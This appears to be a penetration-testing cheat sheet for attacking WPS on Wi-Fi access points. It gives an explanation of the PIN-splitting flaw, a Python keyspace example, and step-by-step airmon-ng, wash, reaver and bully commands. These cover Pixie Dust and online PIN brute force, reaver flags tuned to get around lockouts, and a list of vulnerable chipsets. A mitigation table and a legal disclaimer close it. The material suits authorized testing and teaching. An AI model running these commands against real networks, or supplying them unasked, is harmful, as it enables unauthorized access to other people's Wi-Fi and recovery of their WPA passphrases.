
Overview

A WPS (Wi-Fi Protected Setup) PIN is an 8-digit code whose two 4-digit halves the AP verifies separately, telling the client after the first half whether it was correct. Because the last digit is a checksum derived from the other seven, the first half has 10,000 possibilities and the second only 1,000, so the worst case is about 11,000 guesses instead of 10⁸. This design flaw makes online brute force feasible. Pixie Dust exploits weak nonce generation in some chipsets to recover the PIN offline in seconds.
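As an added worked example (not from the original page), the arithmetic behind the "10⁸ to ~11,000" figure in Python; the check-digit rule is the one from the WPS specification, and the lockout model in worst_case_hours is a simplifying assumption used only to show that lockouts stretch time without changing the bound:

```python
# Added example (not from the original page): the arithmetic behind the
# "10^8 -> ~11,000" figure. The check-digit rule is the one from the WPS
# specification (Luhn-style over the first seven digits).

def wps_checksum(first7: int) -> int:
    """Return the 8th (check) digit for a 7-digit WPS PIN prefix."""
    acc = 0
    n = first7
    while n:
        acc += 3 * (n % 10)  # digits 7, 5, 3, 1 (from the left) weigh 3
        n //= 10
        acc += n % 10        # digits 6, 4, 2 weigh 1
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def keyspace() -> dict:
    """Worst-case number of guesses under three verification models."""
    return {
        # All 8 digits free and verified as a whole.
        "naive": 10 ** 8,
        # The check digit is derived, so only 7 digits carry entropy.
        "checksum_only": 10 ** 7,
        # The AP reveals whether the first half (4 free digits) was right
        # before the second half (3 free digits + check digit) is tried, so
        # the halves are searched one after the other, not combined.
        "split_verification": 10 ** 4 + 10 ** 3,
    }


def worst_case_hours(seconds_per_attempt: float,
                     lockout_after: int = 0, lockout_seconds: float = 0.0) -> float:
    """Hours to exhaust the split keyspace at a given attempt rate.

    Assumed lockout model: the AP locks WPS for lockout_seconds after every
    lockout_after failed attempts. This stretches the time but never
    changes the 11,000-attempt bound, which is why disabling WPS is the
    only complete fix.
    """
    attempts = keyspace()["split_verification"]
    total = attempts * seconds_per_attempt
    if lockout_after:
        total += (attempts // lockout_after) * lockout_seconds
    return total / 3600
```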

Tools

Tool      Purpose
wash      Enumerate WPS-enabled APs
reaver    WPS PIN brute force + Pixie Dust
bully     Alternative WPS PIN brute force + Pixie Dust

1. Enable Monitor Mode

sudo airmon-ng check kill
sudo airmon-ng start wlan0

2. Enumerate WPS-Enabled Networks

sudo wash -i wlan0mon

Key output columns:

Column   Meaning
BSSID    AP MAC address
Ch       Channel
dBm      Signal strength
WPS      WPS version
Lck      Locked (Yes = lockout active)
ESSID    Network name

Target APs with Lck: No.

3. Pixie Dust Attack

Offline attack — recovers the PIN from weak nonces; fast (seconds on vulnerable chipsets).

With reaver:

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv

With bully:

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3

-K 1 (reaver) / -d (bully) = Pixie Dust mode. If successful, the tool outputs the WPS PIN and the WPA passphrase.

4. WPS PIN Brute Force

Online attack — tries all PIN combinations. Takes 4–10 hours on non-locked APs.

With reaver:

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv

With bully:

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -v 3

Resume an interrupted session (reaver):

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S

Session state is saved in /etc/reaver/<BSSID>.wpc.

5. Tune for Rate Limiting / Lockouts

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360

Flag           Effect
--delay        Seconds between PIN attempts
--lock-delay   Wait time after a lockout is detected
--fail-wait    Wait time after consecutive failures

6. Known Vulnerable Chipsets (Pixie Dust)

Chipsets with weak nonce generation:
  • Ralink (RT2860, RT3070, RT5370)
  • Realtek (RTL8188)
  • Broadcom (early firmware)
  • Some Atheros implementations
If Pixie Dust fails, check the chipset against the pixiewps compatibility list.

Mitigation Reference

Defense                  Effect
Disable WPS entirely     Removes the attack surface
Enable AP PIN lockout    Slows brute force, doesn’t stop Pixie Dust
Updated firmware         Patches weak nonce generation

Always run wash first. Attacking a locked AP (Lck: Yes) wastes time — wait for lockout to reset or target a different AP.
Authorized environments only. WPS attacks against networks you don’t own or have explicit permission to test are illegal.